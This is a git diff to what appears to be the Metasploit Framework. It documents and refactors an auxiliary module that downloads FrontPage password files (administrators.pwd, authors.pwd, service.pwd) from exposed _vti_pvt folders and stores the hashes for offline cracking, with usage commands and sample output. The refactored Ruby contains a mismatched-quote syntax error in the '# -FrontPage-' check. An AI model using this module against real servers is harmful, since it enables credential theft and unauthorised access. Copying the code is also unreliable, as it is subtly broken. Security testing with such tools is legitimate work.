diff --git a/modules/auxiliary/scanner/http/frontpage_credential_dump.md b/modules/auxiliary/scanner/http/frontpage_credential_dump.md new file mode 100644 index 0000000000..7eb2916769 --- /dev/null +++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.md @@ -0,0 +1,69 @@ +## Description +When Microsoft FrontPage is run on a non-IIS web server it creates encrypted password files in the _vti_pvt folder. When this folder is accessible, these files can be downloaded and parsed to obtain encrytped passwords. These encrypted passwords can then be cracked offline and used to gain further access to the server. + +Affected Files: + + * administrators.pwd + * authors.pwd + * service.pwd + +Citations: + * https://msdn.microsoft.com/en-us/library/cc750050.aspx + * http://sparty.secniche.org/ + +## Usage +``` +use auxiliary/scanner/http/frontpage_credential_dump +set RHOSTS 10.10.10.10 +set TARGETURI about +run +``` + +## Standard Output +``` +msf auxiliary(scanner/http/frontpage_credential_dump) > run + +[+] 10.10.10.10 - service.pwd +[+] # -FrontPage- +[+] username:kLAsISPJ8AsaQ + +[+] 10.10.10.10 - administrators.pwd +[+] # -FrontPage- +[+] username:wMyvw3d3c1oWU + +[+] 10.10.10.10 - authors.pwd +[+] # -FrontPage- +[+] username:wMyvw3d3c1oWU + +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` + +## Verbose Output +``` +msf auxiliary(scanner/http/frontpage_credential_dump) > run + +[*] Requesting: /about/_vti_pvt/service.pwd +[*] Found /about/_vti_pvt/service.pwd. +[*] Found FrontPage credentials. +[+] 10.10.10.10 - service.pwd +[+] # -FrontPage- +[+] username:kLAsISPJ8AsaQ + +[*] Requesting: /about/_vti_pvt/administrators.pwd +[*] Found /about/_vti_pvt/administrators.pwd. +[*] Found FrontPage credentials. +[+] 10.10.10.10 - administrators.pwd +[+] # -FrontPage- +[+] username:wMyvw3d3c1oWU + +[*] Requesting: /about/_vti_pvt/authors.pwd +[*] Found /about/_vti_pvt/authors.pwd. +[*] Found FrontPage credentials. +[+] 10.10.10.10 - authors.pwd +[+] # -FrontPage- +[+] username:wMyvw3d3c1oWU + +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` diff --git a/modules/auxiliary/scanner/http/frontpage_credential_dump.rb b/modules/auxiliary/scanner/http/frontpage_credential_dump.rb index 7ec2f61d3f..23ef1a5bbc 100644 --- a/modules/auxiliary/scanner/http/frontpage_credential_dump.rb +++ b/modules/auxiliary/scanner/http/frontpage_credential_dump.rb @@ -21,8 +21,8 @@ class MetasploitModule < Msf::Auxiliary ], 'Author' => [ - 'Aditya K Sood @adityaksood - Sparty tool', - 'averagesecurityguy - Metasploit module' + 'Aditya K Sood @adityaksood', # Sparty tool', + 'Stephen Haywood @averagesecguy' # Metasploit module' ], 'License' => MSF_LICENSE, )) @@ -42,20 +42,21 @@ class MetasploitModule < Msf::Auxiliary 'method' => 'GET', }) - if res.code == 200 - vprint_status("Found #{uri}.") - if res.body.lines.first.chomp == "# -FrontPage-" - vprint_status("Found FrontPage credentials.") - return res.body - else - vprint_status("Filed does not contain FrontPage credentials.") - vprint_status(res.body) - return nil - end - else + unless res.code == 200 vprint_status("File #{uri} not found.") return nil end + + vprint_status("Found #{uri}.") + + unless res.body.lines.first.chomp == '# -FrontPage-" + vprint_status("File does not contain FrontPage credentials.") + vprint_status(res.body) + return nil + end + + vprint_status("Found FrontPage credentials.") + return res.body end def run_host(ip) @@ -63,17 +64,18 @@ class MetasploitModule < Msf::Auxiliary files.each do |filename| contents = get_pass_file(filename) - if contents != nil - print_good("#{ip} - #{filename}") - contents.each_line do |line| - print_good(line.chomp) - end + next if contents == nil - print_line("") + print_good("#{ip} - #{filename}") - store_loot("frontpage.pwd.file", "text/plain", ip, contents, filename) + contents.each_line do |line| + print_good(line.chomp) end + + print_line() + + store_loot("frontpage.pwd.file", "text/plain", ip, contents, filename) end end end